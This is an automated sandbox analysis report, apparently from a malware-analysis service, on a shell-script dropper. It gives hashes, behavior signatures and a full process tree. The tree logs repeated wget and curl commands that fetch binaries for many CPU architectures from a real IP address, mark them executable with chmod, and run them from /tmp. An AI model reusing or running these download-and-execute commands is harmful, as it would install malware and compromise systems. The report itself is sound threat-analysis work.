Analysis
- max time kernel: 69s
- max time network: 72s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240611-en
- resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 24/11/2024, 01:19
Static task
- static1
Behavioral tasks (same sample in each: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh)
- behavioral1: resource ubuntu1804-amd64-20240611-en
- behavioral2: resource debian9-armhf-20240611-en
- behavioral3: resource debian9-mipsbe-20240611-en
- behavioral4: resource debian9-mipsel-20240226-en
General
- Target: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
- Size: 1KB
- MD5: 513641f5f60d55559c2060489de6d605
- SHA1: c95feec2255732b60d434b0639b88a5cff205ea0
- SHA256: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd
- SHA512: 71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0
Malware Config
Signatures

File and Directory Permissions Modification (1 TTPs, 10 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid | Process
855 | chmod
861 | chmod
735 | chmod
751 | chmod
829 | chmod
849 | chmod
729 | chmod
795 | chmod
808 | chmod
843 | chmod

Executes dropped EXE (10 IoCs)
ioc | pid | Process
/tmp/3AvA | 730 | 3AvA
/tmp/3AvA | 736 | 3AvA
/tmp/3AvA | 753 | 3AvA
/tmp/3AvA | 796 | 3AvA
/tmp/3AvA | 809 | 3AvA
/tmp/3AvA | 830 | 3AvA
/tmp/3AvA | 844 | 3AvA
/tmp/3AvA | 850 | 3AvA
/tmp/3AvA | 856 | 3AvA
/tmp/3AvA | 862 | 3AvA
Reads runtime system information (10 IoCs; the heading was missing from the extracted page and is taken from the tag on the curl processes below)
description | ioc | Process
File opened for reading | /proc/sys/crypto/fips_enabled | curl (10 identical entries, one per curl invocation)
System Network Configuration Discovery (1 TTPs, 4 IoCs)
Adversaries may gather information about the network configuration of a system.
pid | Process
732 | wget
733 | curl
734 | cat
736 | 3AvA

Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
description | ioc | Process
File opened for modification | /tmp/3AvA | 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Processes
(each entry: PID, tree depth, executable path, command line; signatures triggered by that process are listed beneath it)

- PID 699 (depth 1) /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh: /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
  - Writes file to tmp directory
- PID 702 (depth 2) /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.x86
- PID 713 (depth 2) /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.x86
  - Reads runtime system information
- PID 728 (depth 2) /bin/cat: cat UnHAnaAW.x86
- PID 729 (depth 2) /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk
  - File and Directory Permissions Modification
- PID 730 (depth 2) /tmp/3AvA: ./3AvA x86
  - Executes dropped EXE
- PID 732 (depth 2) /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.mips
  - System Network Configuration Discovery
- PID 733 (depth 2) /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.mips
  - Reads runtime system information
  - System Network Configuration Discovery
- PID 734 (depth 2) /bin/cat: cat UnHAnaAW.mips
  - System Network Configuration Discovery
- PID 735 (depth 2) /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk
  - File and Directory Permissions Modification
- PID 736 (depth 2) /tmp/3AvA: ./3AvA mips
  - Executes dropped EXE
  - System Network Configuration Discovery
- PID 738 (depth 2) /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.mpsl
- PID 743 (depth 2) /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl
  - Reads runtime system information
- PID 750 (depth 2) /bin/cat: cat UnHAnaAW.mpsl
- PID 751 (depth 2) /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk
  - File and Directory Permissions Modification
- PID 753 (depth 2) /tmp/3AvA: ./3AvA mpsl
  - Executes dropped EXE
- PID 755 (depth 2) /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.arm4
- PID 790 (depth 2) /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.arm4
  - Reads runtime system information
- PID 794 (depth 2) /bin/cat: cat UnHAnaAW.arm4
- PID 795 (depth 2) /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA
  - File and Directory Permissions Modification
- PID 796 (depth 2) /tmp/3AvA: ./3AvA arm4
  - Executes dropped EXE
- PID 798 (depth 2) /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.arm5
- PID 799 (depth 2) /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.arm5
  - Reads runtime system information
- PID 806 (depth 2) /bin/cat: cat UnHAnaAW.arm5
- PID 808 (depth 2) /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA
  - File and Directory Permissions Modification
- PID 809 (depth 2) /tmp/3AvA: ./3AvA arm5
  - Executes dropped EXE
- PID 812 (depth 2) /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.arm6
- PID 815 (depth 2) /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.arm6
  - Reads runtime system information
- PID 827 (depth 2) /bin/cat: cat UnHAnaAW.arm6
- PID 829 (depth 2) /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA
  - File and Directory Permissions Modification
- PID 830 (depth 2) /tmp/3AvA: ./3AvA arm6
  - Executes dropped EXE
- PID 832 (depth 2) /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.arm7
- PID 841 (depth 2) /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.arm7
  - Reads runtime system information
- PID 842 (depth 2) /bin/cat: cat UnHAnaAW.arm7
- PID 843 (depth 2) /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA
  - File and Directory Permissions Modification
- PID 844 (depth 2) /tmp/3AvA: ./3AvA arm7
  - Executes dropped EXE
- PID 846 (depth 2) /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.ppc
- PID 847 (depth 2) /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.ppc
  - Reads runtime system information
- PID 848 (depth 2) /bin/cat: cat UnHAnaAW.ppc
- PID 849 (depth 2) /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA
  - File and Directory Permissions Modification
- PID 850 (depth 2) /tmp/3AvA: ./3AvA ppc
  - Executes dropped EXE
- PID 852 (depth 2) /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.m68k
- PID 853 (depth 2) /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.m68k
  - Reads runtime system information
- PID 854 (depth 2) /bin/cat: cat UnHAnaAW.m68k
- PID 855 (depth 2) /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA
  - File and Directory Permissions Modification
- PID 856 (depth 2) /tmp/3AvA: ./3AvA m68k
  - Executes dropped EXE
- PID 858 (depth 2) /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.sh4
- PID 859 (depth 2) /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.sh4
  - Reads runtime system information
- PID 860 (depth 2) /bin/cat: cat UnHAnaAW.sh4
- PID 861 (depth 2) /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA
  - File and Directory Permissions Modification
- PID 862 (depth 2) /tmp/3AvA: ./3AvA sh4
  - Executes dropped EXE